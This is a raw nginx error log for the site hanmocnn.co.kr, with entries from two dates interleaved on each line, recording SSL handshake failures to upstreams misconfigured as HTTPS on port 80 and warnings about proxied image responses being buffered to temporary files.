2026/02/14 23:45:26 [error] 506#506: *1033 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 94.247.172.129, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:57:14 [warn] 991#991: *107956 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/16/0000022164 while reading upstream, client: 222.239.104.26, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/"
2026/02/14 23:45:26 [warn] 506#506: *1033 upstream server temporarily disabled while SSL handshaking to upstream, client: 94.247.172.129, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:57:14 [warn] 992#992: *107962 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/16/0000022165 while reading upstream, client: 222.239.104.26, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/"
2026/02/14 23:51:03 [error] 509#509: *1193 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:57:14 [warn] 990#990: *107961 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000022166 while reading upstream, client: 222.239.104.26, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/"
2026/02/14 23:51:03 [warn] 509#509: *1193 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:57:14 [warn] 991#991: *107957 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/16/0000022167 while reading upstream, client: 222.239.104.26, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/"
2026/02/14 23:51:03 [error] 509#509: *1193 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:57:14 [warn] 985#985: *107963 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/16/0000022168 while reading upstream, client: 222.239.104.26, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/"
2026/02/14 23:51:03 [warn] 509#509: *1193 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 02:57:14 [warn] 991#991: *107956 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/16/0000022169 while reading upstream, client: 222.239.104.26, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/"
2026/02/14 23:51:15 [error] 509#509: *1193 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:04:45 [warn] 991#991: *107982 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/17/0000022170 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:51:15 [warn] 509#509: *1193 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:04:45 [warn] 991#991: *107982 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/17/0000022171 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:51:15 [error] 509#509: *1193 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:07:21 [warn] 990#990: *108011 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/17/0000022172 while reading upstream, client: 222.239.104.30, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/"
2026/02/14 23:51:15 [warn] 509#509: *1193 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:07:21 [warn] 992#992: *108015 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/17/0000022173 while reading upstream, client: 222.239.104.30, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/"
2026/02/14 23:51:31 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:07:21 [warn] 992#992: *108020 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/17/0000022174 while reading upstream, client: 222.239.104.30, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/"
2026/02/14 23:51:31 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:07:21 [warn] 992#992: *108021 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/17/0000022175 while reading upstream, client: 222.239.104.30, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/"
2026/02/14 23:51:31 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:07:21 [warn] 990#990: *108016 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/17/0000022176 while reading upstream, client: 222.239.104.30, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/"
2026/02/14 23:51:31 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:07:21 [warn] 992#992: *108022 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/17/0000022177 while reading upstream, client: 222.239.104.30, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/"
2026/02/14 23:51:33 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:07:21 [warn] 992#992: *108015 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/17/0000022178 while reading upstream, client: 222.239.104.30, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "hanmocnn.co.kr", referrer: "https://hanmocnn.co.kr/"
2026/02/14 23:51:33 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:09:37 [warn] 990#990: *108034 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/17/0000022179 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:51:33 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:09:37 [warn] 990#990: *108034 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/18/0000022180 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:51:33 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:09:37 [warn] 990#990: *108034 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/18/0000022181 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:51:38 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:14:36 [warn] 990#990: *108067 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/18/0000022182 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:51:38 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:14:36 [warn] 990#990: *108067 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/18/0000022183 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:51:38 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:14:36 [warn] 990#990: *108067 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/18/0000022184 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:51:38 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:14:36 [warn] 990#990: *108067 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/18/0000022185 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:52:14 [error] 543#543: *1232 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:18:32 [warn] 990#990: *108091 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/18/0000022186 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:52:14 [warn] 543#543: *1232 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:26:50 [warn] 992#992: *108118 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/18/0000022187 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:52:14 [error] 543#543: *1232 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:26:50 [warn] 992#992: *108118 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/18/0000022188 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:52:14 [warn] 543#543: *1232 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:26:50 [warn] 992#992: *108118 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/18/0000022189 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:56:38 [error] 605#605: *1291 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:28:26 [warn] 992#992: *108133 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/19/0000022190 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:56:38 [warn] 605#605: *1291 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:28:26 [warn] 992#992: *108133 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/19/0000022191 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:56:38 [error] 605#605: *1291 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:34:31 [warn] 992#992: *108157 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/19/0000022192 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:56:38 [warn] 605#605: *1291 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:34:31 [warn] 992#992: *108157 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/19/0000022193 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:56:43 [error] 605#605: *1291 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:34:31 [warn] 992#992: *108157 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/19/0000022194 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:56:43 [warn] 605#605: *1291 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:44:57 [warn] 992#992: *108175 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/19/0000022195 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:56:43 [error] 605#605: *1291 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:44:57 [warn] 992#992: *108175 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/19/0000022196 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:56:43 [warn] 605#605: *1291 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:44:57 [warn] 992#992: *108175 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/19/0000022197 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:56:51 [error] 606#606: *1299 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:49:35 [warn] 992#992: *108236 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/19/0000022199 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:56:51 [warn] 606#606: *1299 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:56:42 [warn] 985#985: *108267 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/20/0000022200 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:56:51 [error] 606#606: *1299 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:56:42 [warn] 985#985: *108267 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/20/0000022201 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:56:51 [warn] 606#606: *1299 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 03:56:42 [warn] 985#985: *108267 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/20/0000022202 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:57:26 [error] 194#194: *1 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 04:03:19 [warn] 985#985: *108294 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/20/0000022203 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:57:26 [warn] 194#194: *1 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 04:03:19 [warn] 985#985: *108294 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/20/0000022204 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:57:26 [error] 194#194: *1 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 04:03:19 [warn] 985#985: *108294 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/20/0000022205 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:57:26 [warn] 194#194: *1 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 04:07:41 [warn] 985#985: *108325 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/20/0000022206 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
